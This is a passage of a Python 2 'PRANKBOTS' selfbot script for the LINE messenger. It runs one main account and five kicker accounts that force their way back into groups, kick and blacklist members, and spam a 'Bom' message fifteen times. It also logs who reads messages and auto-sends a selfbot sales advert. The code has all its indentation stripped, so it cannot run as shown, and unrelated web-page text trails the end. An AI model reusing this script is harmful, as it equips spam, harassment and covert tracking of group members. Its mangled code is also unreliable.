acil.sendMessage(msg)
elif msg.text.lower() == '.':
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = False
acil.updateGroup(G)
invsend = 0
Ticket = acil.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
random.choice(KAC).updateGroup(G)
#-----------------------------------------------
elif msg.text.lower() == 'reinvite':
if msg.toType == 2:
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
acil.sendText(msg.to,"waitting...")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
G.preventJoinByTicket = False
acil.updateGroup(G)
invsend = 0
Ticket = acil.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
#-----------------------------------------------
elif "B1 in" in msg.text:
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = False
acil.updateGroup(G)
invsend = 0
Ticket = acil.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
#-----------------------------------------------
elif "B2 in" in msg.text:
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = False
acil.updateGroup(G)
invsend = 0
Ticket = acil.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "B3 in" in msg.text:
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = False
acil.updateGroup(G)
invsend = 0
Ticket = acil.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "B4 in" in msg.text:
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = False
acil.updateGroup(G)
invsend = 0
Ticket = acil.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki3.updateGroup(G)
#-----------------------------------------------
elif "B5 in" in msg.text:
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = False
acil.updateGroup(G)
invsend = 0
Ticket = acil.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = acil.getGroup(msg.to)
ginfo = acil.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki5.updateGroup(G)
elif msg.text.lower() == ',':
if msg.toType == 2:
ginfo = acil.getGroup(msg.to)
try:
ki.sendText(msg.to,"Bye Bye😘 " + str(ginfo.name) + "")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Bye" in msg.text:
if msg.toType == 2:
ginfo = acil.getGroup(msg.to)
try:
acil.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B1 bye" in msg.text:
if msg.toType == 2:
ginfo = acil.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B2 bye" in msg.text:
if msg.toType == 2:
ginfo = acil.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B3 bye" in msg.text:
if msg.toType == 2:
ginfo = acil.getGroup(msg.to)
try:
ki3.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B4 bye" in msg.text:
if msg.toType == 2:
ginfo = acil.getGroup(msg.to)
try:
ki4.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B5 bye" in msg.text:
if msg.toType == 2:
ginfo = acil.getGroup(msg.to)
try:
ki5.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Welcome","wc","welcome","Wc"]:
ginfo = acil.getGroup(msg.to)
acil.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
acil.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
elif "Bc " in msg.text:
bctxt = msg.text.replace("Bc ","")
ki.sendText(msg.to,(bctxt))
elif "Say " in msg.text:
bctxt = msg.text.replace("Say ","")
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
elif "Bom " in msg.text:
bctxt = msg.text.replace("Bom ","")
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
elif msg.text.lower() == 'ping':
ki.sendText(msg.to,"Ping ")
ki2.sendText(msg.to,"Ping ")
ki3.sendText(msg.to,"Ping ")
ki4.sendText(msg.to,"Ping ")
ki5.sendText(msg.to,"Ping ")
if op.type == 19:
try:
if op.param3 in mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
acil.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
acil.updateGroup(G)
ki.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
acil.updateGroup(G)
ki2.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki3mid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
acil.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki2mid:
if op.param2 in ki3mid:
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
else:
G = ki3.getGroup(op.param1)
ki3.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
acil.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki4mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
acil.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
acil.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki5mid:
if op.param2 in ki4mid:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
else:
G = ki4.getGroup(op.param1)
ki4.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
acil.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki4mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
acil.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki3mid:
if op.param2 in mid:
G = acil.getGroup(op.param1)
G.preventJoinByTicket = False
acil.updateGroup(G)
Ticket = acil.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
acil.updateGroup(G)
else:
G = acil.getGroup(op.param1)
acil.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
acil.updateGroup(G)
Ticket = acil.reissueGroupTicket(op.param1)
acil.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
acil.updateGroup(G)
wait["blacklist"][op.param2] = True
except:
pass
if op.type == 17:
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
ki5.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
random.choice(KAK).kickoutFromGroup(op.param1,[op.param2])
except:
pass
elif op.param2 not in Bots:
if op.param2 not in PRANKBOT:
random.choice(KAC).sendText(op.param1,"Welcome. Don't Play Bots. I can kick you!")
if op.type == 19:
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
acil.sendText(op.param1,"")
else:
acil.sendText(op.param1,"")
if op.type == 13:
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
acil.sendText(op.param1,"")
else:
acil.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
acil.cancelGroupInvitation(op.param1,[contact.mid for contact in acil.getGroup(op.param1).invitee])
else:
acil.sendText(op.param1,"")
else:
acil.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
acil.cancelGroupInvitation(op.param1,[contact.mid for contact in acil.getGroup(op.param1).invitee])
else:
acil.sendText(op.param1,"JANGAN INVITE TANPA SEIJIN ADMIN.!")
else:
acil.sendText(op.param1,"")
if op.type == 11:
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
acil.sendText(op.param1,"")
else:
acil.sendText(op.param1,"")
if op.type == 5:
if wait["autoAdd"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':'u5818cb4404411c2e2e6e6937d172cca8'}
acil.sendImageWithURL(op.param1,"|======AUTO ADD======|\n\nSUBCRABE MY CHANNEL YOUTUBE\n\nhttps://www.youtube.com/channel/UCycBrqSWEHdk-slnhUmGWiQ\n\nMENERIMA PESANAN SELFBOT MINAT.!!\nINFO LANGSUNG KE\n\nID:::::http://line.me/ti/p/~adiputra.95")
if (wait["message"] in [""," ","\n",None]):
pass
else:
acil.sendText(op.param1,str(wait["message"]))
acil.sendMessage(c)
ki.sendText(op.param1,str(wait["message"]))
ki.sendMessage(c)
ki2.sendText(op.param1,str(wait["message"]))
ki2.sendMessage(c)
ki3.sendText(op.param1,str(wait["message"]))
ki3.sendMessage(c)
ki4.sendText(op.param1,str(wait["message"]))
ki4.sendMessage(c)
ki5.sendText(op.param1,str(wait["message"]))
ki5.sendMessage(c)
#------Open QR Kick start------#
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
random.choice(KAC).updateGroup(G)
#------Open Kick finish-----#
#------invite Kick start------#
if op.type == 13:
if wait["inviteprotect"] == True:
if op.param2 not in Bots:
if op.param2 not in PRANKBOT:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
random.choice(KAC).updateGroup(G)
#------invite Kick finish-----#
if op.type == 55:
try:
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
Name = acil.getContact(op.param2).displayName
Np = acil.getContact(op.param2).pictureStatus
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n� " + Name
if " " in Name:
nick = Name.split(' ')
if len(nick) == 2:
acil.sendText(op.param1,"═════════SIDER═════════\n" + nick[0] + "\n" + wait["sider1"])
acil.sendImageWithURL(op.param1, "http://dl.profile.line-cdn.net/" + Np)
else:
acil.sendText(op.param1,"═════════SIDER═════════\n" + nick[0] + "\n" + wait["sider1"])
acil.sendImageWithURL(op.param1, "http://dl.profile.line-cdn.net/" + Np)
else:
acil.sendText(op.param1,"═════════SIDER═════════\n" + nick[0] + "\n" + wait["sider1"])
acil.sendImageWithURL(op.param1, "http://dl.profile.line-cdn.net/" + Np)
else:
pass
else:
pass
except:
pass
else:
pass
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = acil.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
acil.sendText
if op.type == 17:
if wait["wcOn"] == True:
ginfo = acil.getGroup(op.param1)
contact = acil.getContact(op.param2)
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
acil.sendText(op.param1,wait["joingc"] + "\n" + acil.getContact(op.param2).displayName + "\nDi grup " + str(ginfo.name) + "\nPembuat grup " + ginfo.creator.displayName + "\n\n══════WE ARE FROM PRANKBOTS═══════")
acil.sendMessage(c)
acil.sendImageWithURL(op.param1,"http://dl.profile.line-cdn.net/" + contact.pictureStatus)
print ("MEMBER JOIN TO GROUP")
if op.type == 15:
if wait["leftOn"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
acil.sendMessage(c)
acil.sendText(op.param1,acil.getContact(op.param2).displayName + "\n" + wait["leftgc"])
print ("MEMBER HAS LEFT THE GROUP")
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
if op.param2 in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += op.param2
wait2['ROM'][op.param1][op.param2] = op.param2
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
else:
pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = acil.getProfile()
profile.displayName = wait["cName"] + nowT
acil.updateProfile(profile)
time.sleep(0.30)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = acil.fetchOps(acil.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(acil.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
acil.Poll.rev = max(acil.Poll.rev, Op.revision)
bot(Op)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.